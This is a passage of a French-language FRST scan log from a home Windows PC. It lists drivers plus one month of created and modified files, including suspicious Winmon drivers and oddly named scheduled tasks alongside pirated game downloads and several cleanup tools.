C:\Windows\System32\Drivers\SmartDefragDriver.sys [30744 2017-03-09] (IObit Information Technology -> IObit) S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2018-05-04] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.) R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zéro octet Fichier/Dossier) R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zéro octet Fichier/Dossier) R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-07-02] (WDKTestCert Admin,131666266076831434 -> ) [Fichier non signé] S3 cpuz143; \??\C:\Windows\temp\cpuz143\cpuz143_x64.sys [X] U3 MBAMService; pas de ImagePath ==================== NetSvcs (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ==================== Un mois (créés) ======== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2019-07-04 10:04 - 2019-07-04 10:05 - 000028820 _____ C:\Users\nathan\Desktop\FRST.txt 2019-07-04 10:04 - 2019-07-04 10:04 - 000000000 ____D C:\Users\nathan\Desktop\FRST-OlderVersion 2019-07-04 07:20 - 2019-07-04 07:20 - 000268433 _____ C:\Users\nathan\Desktop\ZHPDiag.txt 2019-07-04 07:16 - 2019-07-04 07:16 - 000003492 _____ C:\Windows\System32\Tasks\ScheduledUpdate 2019-07-04 07:16 - 2019-07-04 07:16 - 000003184 _____ C:\Windows\System32\Tasks\csrss 2019-07-04 07:14 - 2019-07-04 07:14 - 000015177 _____ C:\Users\nathan\Desktop\ZHPFix.txt 2019-07-04 07:12 - 2019-07-04 07:12 - 000000815 _____ C:\Users\nathan\Desktop\ZHPFix2.lnk 2019-07-03 15:01 - 2019-07-03 15:01 - 003033984 _____ (Nicolas Coolman) C:\Users\nathan\ZHPDiag3.exe 2019-07-03 11:22 - 2019-07-04 07:15 - 000068424 _____ (EnigmaSoft Limited) C:\Windows\system32\Drivers\EnigmaFileMonDriver.sys 2019-07-03 11:22 - 2019-07-03 11:22 - 000001014 _____ C:\Users\Public\Desktop\SpyHunter5.lnk 2019-07-03 11:22 - 2019-07-03 11:22 - 000000000 ____D C:\sh5ldr 2019-07-03 11:22 - 2019-07-03 11:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnigmaSoft 2019-07-03 11:22 - 2019-07-03 11:22 - 000000000 ____D C:\ProgramData\EnigmaSoft Limited 2019-07-03 11:21 - 2019-07-03 11:21 - 000000000 ____D C:\Program Files\EnigmaSoft 2019-07-03 11:11 - 2019-07-03 11:11 - 000003870 _____ C:\Windows\System32\Tasks\CCleaner Update 2019-07-03 11:11 - 2019-07-03 11:11 - 000002812 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC 2019-07-03 11:11 - 2019-07-03 11:11 - 000000824 _____ C:\Users\Public\Desktop\CCleaner.lnk 2019-07-03 11:11 - 2019-07-03 11:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner 2019-07-03 11:11 - 2019-07-03 11:11 - 000000000 ____D C:\Program Files\CCleaner 2019-07-03 11:08 - 2019-07-03 11:08 - 000001484 _____ C:\Users\nathan\Desktop\CodeStuff Starter.lnk 2019-07-03 11:08 - 2019-07-03 11:08 - 000000000 ____D C:\Users\nathan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CodeStuff Starter 2019-07-03 11:08 - 2019-07-03 11:08 - 000000000 ____D C:\Starter 2019-07-03 11:08 - 2019-07-03 11:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeStuff Starter 2019-07-03 10:50 - 2019-07-04 07:20 - 000002844 _____ C:\Windows\System32\Tasks\Driver Booster SkipUAC (nathan) 2019-07-03 10:50 - 2019-07-03 10:50 - 000003096 _____ C:\Windows\System32\Tasks\Driver Booster Scheduler 2019-07-03 10:50 - 2019-07-03 10:50 - 000002292 _____ C:\Users\Public\Desktop\Driver Booster 6.lnk 2019-07-03 09:39 - 2019-07-03 09:39 - 000000853 _____ C:\Users\nathan\Desktop\µTorrent.lnk 2019-07-03 09:30 - 2019-07-03 09:30 - 000001437 _____ C:\Users\Public\Desktop\iTunes.lnk 2019-07-03 09:30 - 2019-07-03 09:30 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes 2019-07-03 09:30 - 2019-07-03 09:30 - 000000000 ____D C:\Program Files\iPod 2019-07-02 18:01 - 2019-07-02 18:11 - 000000000 ____D C:\Users\nathan\AppData\Roaming\WiperSoft 2019-07-02 17:34 - 2018-07-11 15:28 - 000029096 _____ (IObit) C:\Windows\system32\RegistryDefragBootTime.exe 2019-07-02 17:30 - 2019-07-02 17:34 - 000002272 _____ C:\Users\Public\Desktop\Advanced SystemCare 12.lnk 2019-07-02 17:25 - 2019-07-02 17:25 - 000000000 ____D C:\ProgramData\nathan 2019-07-02 15:59 - 2019-07-02 15:59 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys 2019-07-02 09:17 - 2019-07-04 10:04 - 002420224 _____ (Farbar) C:\Users\nathan\Desktop\FRST64.exe 2019-07-02 09:17 - 2019-07-04 10:04 - 000000000 ____D C:\FRST 2019-07-01 21:46 - 2019-07-01 21:53 - 000000000 ____D C:\Program Files\Malwarebytes 2019-07-01 21:46 - 2019-07-01 21:46 - 064277752 _____ (Malwarebytes ) C:\Users\nathan\Downloads\mb3-setup-consumer-3.8.3.2965-1.0.613-1.0.11322 (2).exe 2019-07-01 21:37 - 2019-07-01 21:38 - 064277752 _____ (Malwarebytes ) C:\Users\nathan\Downloads\mb3-setup-consumer-3.8.3.2965-1.0.613-1.0.11322 (1).exe 2019-07-01 21:29 - 2019-07-01 21:29 - 064277752 _____ (Malwarebytes ) C:\Users\nathan\Downloads\mb3-setup-consumer-3.8.3.2965-1.0.613-1.0.11322.exe 2019-07-01 21:23 - 2019-07-01 21:33 - 000000000 ____D C:\AdwCleaner 2019-07-01 19:23 - 2019-07-01 19:23 - 007025360 _____ (Malwarebytes) C:\Users\nathan\Downloads\adwcleaner_7.3.exe 2019-07-01 19:23 - 2019-07-01 19:23 - 007025360 _____ (Malwarebytes) C:\Users\nathan\Desktop\adwcleaner_7.3.exe 2019-07-01 19:19 - 2019-07-01 19:19 - 003147648 _____ (Nicolas Coolman) C:\Users\nathan\Downloads\ZHPCleaner (1).exe 2019-07-01 18:07 - 2019-07-01 18:07 - 003064832 _____ (Nicolas Coolman) C:\Users\nathan\Downloads\zhpfix_2017.11-21.2 (3).exe 2019-07-01 18:06 - 2019-07-01 18:06 - 003064832 _____ (Nicolas Coolman) C:\Users\nathan\Downloads\zhpfix_2017.11-21.2 (2).exe 2019-07-01 17:59 - 2019-07-01 17:59 - 003147648 _____ (Nicolas Coolman) C:\Users\nathan\Downloads\ZHPCleaner.exe 2019-07-01 17:59 - 2019-07-01 17:59 - 000000834 _____ C:\Users\nathan\Desktop\ZHPCleaner.lnk 2019-07-01 17:47 - 2019-07-01 17:47 - 003064832 _____ (Nicolas Coolman) C:\Users\nathan\Downloads\zhpfix_2017.11-21.2.exe 2019-07-01 17:47 - 2019-07-01 17:47 - 003064832 _____ (Nicolas Coolman) C:\Users\nathan\Downloads\zhpfix_2017.11-21.2 (1).exe 2019-07-01 17:47 - 2019-07-01 17:47 - 000000000 ____D C:\Users\nathan\Downloads\Quarantine 2019-07-01 17:34 - 2019-07-04 07:20 - 000000000 ____D C:\Users\nathan\AppData\Roaming\ZHP 2019-07-01 17:34 - 2019-07-04 07:12 - 000000000 ____D C:\Users\nathan\AppData\Local\ZHP 2019-07-01 17:34 - 2019-07-03 15:01 - 000000665 _____ C:\Users\nathan\Desktop\ZHPDiag.lnk 2019-07-01 17:34 - 2019-07-01 17:34 - 003040640 _____ (Nicolas Coolman) C:\Users\nathan\Downloads\ZHPDiag3.exe 2019-07-01 16:09 - 2019-07-02 17:30 - 000003022 _____ C:\Windows\System32\Tasks\ASC12_PerformanceMonitor 2019-06-30 15:38 - 2019-01-21 14:53 - 000070240 _____ (IObit) C:\Windows\system32\Drivers\imfpffilter.sys 2019-06-30 15:04 - 2019-06-30 15:04 - 000722944 _____ C:\Users\nathan\AppData\Local\sha.db 2019-06-30 15:04 - 2019-06-30 15:04 - 000140800 _____ C:\Users\nathan\AppData\Local\installer.dat 2019-06-30 14:36 - 2019-06-30 14:36 - 061370712 _____ (Discord Inc.) C:\Users\nathan\Downloads\DiscordSetup.exe 2019-06-30 13:49 - 2019-06-30 13:49 - 000002826 _____ C:\Windows\System32\Tasks\IMF_SkipUAC_nathan 2019-06-30 13:49 - 2019-06-30 13:49 - 000001185 _____ C:\Users\Public\Desktop\IObit Malware Fighter.lnk 2019-06-30 13:49 - 2019-06-30 13:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter 2019-06-30 13:48 - 2019-06-30 13:48 - 000094184 _____ C:\Users\nathan\AppData\Local\GDIPFONTCACHEV1.DAT 2019-06-30 13:31 - 2019-06-30 13:31 - 000000000 ____D C:\Users\nathan\AppData\Local\CEF 2019-06-30 13:31 - 2019-06-30 13:31 - 000000000 ____D C:\Users\nathan\ansel 2019-06-29 11:34 - 2019-06-29 11:34 - 000002890 _____ C:\Windows\System32\Tasks\ewSXxaflLkNov2 2019-06-29 11:33 - 2019-07-02 12:45 - 000000008 __RSH C:\Users\nathan\ntuser.pol 2019-06-29 11:25 - 2019-06-29 11:25 - 000000000 ____D C:\Users\nathan\AppData\Roaming\Mozilla 2019-06-29 11:21 - 2019-06-29 11:21 - 000000000 ____D C:\Users\nathan\AppData\Roaming\Macromedia 2019-06-29 11:17 - 2019-06-29 11:17 - 000000000 ____D C:\Users\nathan\AppData\Roaming\Python 2019-06-29 11:16 - 2019-06-30 12:55 - 000000000 ___HD C:\Program Files (x86)\speakeasy 2019-06-29 11:16 - 2019-06-29 11:16 - 005577408 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe 2019-06-29 11:16 - 2019-06-29 11:16 - 000797376 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2019-06-29 11:16 - 2019-06-29 11:16 - 000634272 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe 2019-06-29 11:16 - 2019-06-29 11:16 - 000142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2019-06-29 11:16 - 2019-06-29 11:16 - 000002982 _____ C:\Windows\System32\Tasks\Intel Rapid 2019-06-29 11:16 - 2019-06-29 11:16 - 000000000 ___HD C:\Program Files (x86)\Marginalize 2019-06-29 11:16 - 2019-06-29 11:16 - 000000000 ____D C:\Windows\SysWOW64\Macromed 2019-06-29 11:16 - 2019-06-29 11:16 - 000000000 ____D C:\Windows\system32\Macromed 2019-06-29 11:16 - 2019-06-29 11:16 - 000000000 ____D C:\Users\nathan\AppData\Roaming\Intel Rapid 2019-06-29 11:15 - 2019-06-29 11:15 - 000030912 _____ (FsFilter Network) C:\Windows\system32\Drivers\8f00b204e9800998.sys 2019-06-29 11:15 - 2019-06-29 11:15 - 000000000 ____D C:\Windows\SysWOW64\yzrnpmcu 2019-06-29 11:14 - 2019-07-02 12:45 - 000000008 __RSH C:\ProgramData\ntuser.pol 2019-06-29 11:14 - 2019-06-29 11:14 - 000000000 ____D C:\ProgramData\Pader 2019-06-29 11:10 - 2019-06-29 11:10 - 003252622 _____ C:\Users\nathan\Downloads\total_war_cpy_af3bf.zip 2019-06-26 01:04 - 2019-06-26 01:04 - 000000520 _____ C:\Users\Public\Desktop\CPUID CPU-Z.lnk 2019-06-26 01:04 - 2019-06-26 01:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CPUID 2019-06-26 01:03 - 2019-06-26 01:03 - 001867752 _____ (CPUID, Inc. ) C:\Users\nathan\Downloads\cpu-z_1.89-en.exe 2019-06-24 18:29 - 2019-06-24 18:29 - 002958243 _____ C:\Users\nathan\Downloads\KLIM-Aim-Driver.rar 2019-06-24 18:29 - 2019-06-24 18:29 - 000001892 _____ C:\Users\Public\Desktop\KLIM AIM Gaming Mouse.exe.lnk 2019-06-24 18:29 - 2019-06-24 18:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KLIM AIM Gaming Mouse 3.0 2019-06-24 18:29 - 2019-06-24 18:29 - 000000000 ____D C:\Program Files\KLIM AIM Gaming Mouse 2019-06-24 18:29 - 2019-06-24 18:29 - 000000000 ____D C:\Program Files (x86)\KLIM AIM Gaming Mouse 2019-06-24 18:29 - 2017-04-12 16:40 - 000003596 _____ C:\Windows\system32\GmTaskPlan64.xml 2019-06-24 12:21 - 2019-06-24 12:21 - 000020945 _____ C:\Users\nathan\Downloads\They.Are.Billions-HOODLUM.torrent 2019-06-23 21:11 - 2019-07-02 16:20 - 000000093 _____ C:\Users\nathan\Desktop\Nouveau document texte (3).txt 2019-06-22 08:54 - 2019-06-22 08:54 - 000000000 ____D C:\Users\nathan\Documents\U-Play online 2019-06-22 08:50 - 2019-06-22 08:51 - 937889150 _____ C:\Users\nathan\Downloads\Esports.Life.Tycoon.Early.Access (1).rar 2019-06-22 08:46 - 2019-06-22 08:46 - 001211940 _____ C:\Users\nathan\Downloads\Fix.zip 2019-06-21 18:33 - 2019-06-21 18:33 - 000076985 _____ C:\Users\nathan\Downloads\Total.War.THREE.KINGDOMS-FULL.UNLOCKED (2).torrent 2019-06-21 15:50 - 2019-06-21 15:50 - 937889150 _____ C:\Users\nathan\Downloads\Esports.Life.Tycoon.Early.Access.rar 2019-06-19 11:40 - 2019-06-19 11:41 - 000000000 ____D C:\ProgramData\Epic 2019-06-19 11:40 - 2019-06-19 11:40 - 033796096 _____ C:\Users\nathan\Downloads\EpicInstaller-10.2.2-2735ef4921a64954bf91d66aa944f439.msi 2019-06-19 11:40 - 2019-06-19 11:40 - 000000805 _____ C:\Users\nathan\Desktop\Epic Games Launcher.lnk 2019-06-19 11:40 - 2019-06-19 11:40 - 000000805 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk 2019-06-19 11:40 - 2019-06-19 11:40 - 000000000 ____D C:\Users\nathan\AppData\Local\UnrealEngineLauncher 2019-06-19 11:40 - 2019-06-19 11:40 - 000000000 ____D C:\Users\nathan\AppData\Local\EpicGamesLauncher 2019-06-15 00:32 - 2019-06-15 00:35 - 000000000 ____D C:\Users\nathan\Documents\FIFA 18 2019-06-04 17:58 - 2019-06-04 17:58 - 380578803 _____ C:\Users\nathan\Downloads\Generals.And.Rulers-TiNYiSO.zip 2019-06-04 17:52 - 2019-06-24 13:00 - 000000000 ____D C:\Users\nathan\Documents\My Games ==================== Un mois (modifiés) ======== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2019-07-04 07:22 - 2009-07-14 06:45 - 000027296 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2019-07-04 07:22 - 2009-07-14 06:45 - 000027296 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2019-07-04 07:19 - 2009-07-14 17:24 - 000746916 _____ C:\Windows\system32\perfh00C.dat 2019-07-04 07:19 - 2009-07-14 17:24 - 000149440 _____ C:\Windows\system32\perfc00C.dat 2019-07-04 07:19 - 2009-07-14 07:13 - 001667292 _____ C:\Windows\system32\PerfStringBackup.INI 2019-07-04 07:19 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\inf 2019-07-04 07:15 - 2018-06-23 13:13 - 000000000 ____D C:\ProgramData\NVIDIA 2019-07-04 07:15 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2019-07-03 15:01 - 2018-06-23 13:13 - 000000000 ____D C:\Users\nathan 2019-07-03 11:27 - 2018-06-10 15:19 - 000002224 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2019-07-03 11:27 - 2018-06-10 15:19 - 000002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2019-07-03 11:12 - 2018-12-05 16:01 - 000000000 ____D C:\Windows\Minidump 2019-07-03 11:12 - 2018-06-10 21:43 - 000000000 ____D C:\Users\nathan\AppData\Roaming\uTorrent 2019-07-03 11:12 - 2018-06-10 15:05 - 000000000 ____D C:\Users\nathan\AppData\Local\CrashDumps 2019-07-03 10:50 - 2019-01-26 15:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Driver Booster 6 2019-07-03 10:50 - 2018-06-10 16:29 - 000000000 ____D C:\ProgramData\IObit 2019-07-03 10:50 - 2018-06-10 16:29 - 000000000 ____D C:\Program Files (x86)\IObit 2019-07-03 10:44 - 2018-06-10 16:04 - 000000000 ____D C:\Users\nathan\AppData\Local\SquirrelTemp 2019-07-03 10:27 - 2018-06-10 15:37 - 000000000 ____D C:\Users\nathan\AppData\Local\Battle.net 2019-07-03 09:39 - 2019-03-23 21:34 - 000000000 ____D C:\Users\nathan\AppData\Local\BitTorrentHelper 2019-07-02 19:18 - 2018-09-24 18:23 - 068894720 _____ C:\Windows\system32\config\SOFTWARE.iodefrag.bak 2019-07-02 19:18 - 2018-09-24 18:23 - 005263360 _____ C:\Windows\system32\config\DEFAULT.iodefrag.bak 2019-07-02 19:18 - 2018-09-24 18:23 - 000024576 _____ C:\Windows\system32\config\SECURITY.iodefrag.bak 2019-07-02 19:18 - 2018-09-24 18:23 - 000024576 _____ C:\Windows\system32\config\SAM.iodefrag.bak 2019-07-02 17:36 - 2018-06-10 16:29 - 000000000 ____D C:\Users\nathan\AppData\Roaming\IObit 2019-07-02 17:30 - 2018-11-16 16:25 - 000002826 _____ C:\Windows\System32\Tasks\ASC12_SkipUac_nathan 2019-07-02 17:30 - 2018-06-10 16:29 - 000000000 ____D C:\Users\nathan\AppData\LocalLow\IObit 2019-07-02 12:41 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\system32\GroupPolicy 2019-07-01 22:08 - 2018-06-23 13:25 - 000000879 _____ C:\Users\nathan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2019-07-01 17:09 - 2019-01-26 15:54 - 000002862 _____ C:\Windows\System32\Tasks\Uninstaller_SkipUac_nathan 2019-07-01 17:09 - 2018-06-20 22:05 - 000001365 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Uninstaller.lnk 2019-07-01 17:09 - 2018-06-20 22:05 - 000001353 _____ C:\Users\Public\Desktop\IObit Uninstaller.lnk 2019-07-01 17:09 - 2018-06-20 22:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Uninstaller 2019-07-01 17:09 - 2018-06-10 16:30 - 000000000 ____D C:\ProgramData\ProductData 2019-06-30 13:10 - 2018-06-11 07:16 - 000000000 ____D C:\Users\nathan\Desktop\jeux bureau 2019-06-29 11:33 - 2009-07-14 07:09 - 000000000 ____D C:\Windows\System32\Tasks\WPD 2019-06-29 11:14 - 2009-07-14 07:32 - 000000000 ____D C:\Program Files\Windows Defender 2019-06-27 10:09 - 2018-06-17 18:15 - 000003942 _____ C:\Windows\System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2019-06-26 15:37 - 2018-06-13 16:04 - 000000000 ____D C:\Users\nathan\AppData\Local\Ubisoft Game Launcher 2019-06-26 01:02 - 2019-05-31 09:42 - 000003704 _____ C:\Windows\System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2019-06-26 01:02 - 2018-06-27 21:20 - 000003798 _____ C:\Windows\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2019-06-26 01:02 - 2018-06-27 21:20 - 000003790 _____ C:\Windows\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2019-06-26 01:02 - 2018-06-23 13:13 - 000000000 ____D C:\Program Files\NVIDIA Corporation 2019-06-26 01:02 - 2018-06-23 13:13 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation 2019-06-26 01:02 - 2018-06-10 20:01 - 000004146 _____ C:\Windows\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2019-06-26 01:02 - 2018-06-10 20:01 - 000003738 _____ C:\Windows\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2019-06-26 01:02 - 2018-06-10 20:01 - 000003494 _____ C:\Windows\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2019-06-26 01:02 - 2018-06-10 20:01 - 000000000 ____D C:\ProgramData\NVIDIA Corporation 2019-06-25 11:00 - 2018-06-13 12:46 - 000000000 ____D C:\Users\nathan\AppData\Roaming\DAEMON Tools Lite 2019-06-24 19:58 - 2018-07-21 18:56 - 000000000 ____D C:\Users\nathan\Desktop\Image 2019-06-24 12:01 - 2018-12-30 00:15 - 000000000 ____D C:\Users\nathan\AppData\Roaming\obs-studio 2019-06-19 11:41 - 2018-06-10 20:01 - 000000000 ____D C:\ProgramData\Package Cache 2019-06-19 11:40 - 2018-07-13 18:24 - 000000000 ____D C:\Users\nathan\AppData\Local\UnrealEngine 2019-06-18 10:59 - 2018-06-27 21:20 - 002785776 _____ (NVIDIA Corporation) C:\Windows\system32\nvspcap64.dll 2019-06-18 10:59 - 2018-06-27 21:20 - 002164080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspcap.dll 2019-06-18 10:59 - 2018-06-27 21:20 - 001316664 _____ (NVIDIA Corporation) C:\Windows\system32\NvRtmpStreamer64.dll 2019-06-18 10:56 - 2018-06-10 20:01 - 000001951 _____ C:\Windows\NvTelemetryContainerRecovery.bat 2019-06-16 16:50 - 2019-05-24 22:08 - 000000000 ____D C:\Users\nathan\AppData\Local\Spotify 2019-06-16 16:49 - 2019-05-24 22:07 - 000000000 ____D C:\Users\nathan\AppData\Roaming\Spotify 2019-06-13 05:37 - 2018-06-10 20:01 - 000179184 _____ (NVIDIA Corporation) C:\Windows\system32\nvaudcap64v.dll 2019-06-13 05:37 - 2018-06-10 20:01 - 000154608 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvaudcap32v.dll 2019-06-11 19:01 - 2018-12-29 02:21 - 000000000 ____D C:\Users\nathan\AppData\Roaming\vlc 2019-06-10 11:35 - 2018-07-18 20:16 - 000000000 ____D C:\Program Files\Java 2019-06-10 11:35 - 2018-07-05 16:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2019-06-10 11:34 - 2018-07-05 16:01 - 000110968 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll 2019-06-07 20:26 - 2018-06-13 21:24 - 000000000 ____D C:\Users\nathan\AppData\Local\BattlEye 2019-06-04 17:56 - 2018-10-21 09:12 - 000000000 ____D C:\Users\nathan\Desktop\Hightlight ==================== Fichiers à la racine de certains dossiers ================ 2019-07-03 15:01 - 2019-07-03 15:01 - 003033984 _____ (Nicolas Coolman) C:\Users\nathan\ZHPDiag3.exe 2019-06-30 15:04 - 2019-06-30 15:04 - 000140800 _____ () C:\Users\nathan\AppData\Local\installer.dat 2019-06-30 15:04 - 2019-06-30 15:04 - 000722944 _____ () C:\Users\nathan\AppData\Local\sha.db ==================== FLock ================ 2019-06-29 11:15 C:\Windows\SysWOW64\yzrnpmcu ==================== SigCheck =============================== (Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.) LastRegBack: 2019-07-03 12:08 ==================== Fin de FRST.txt ============================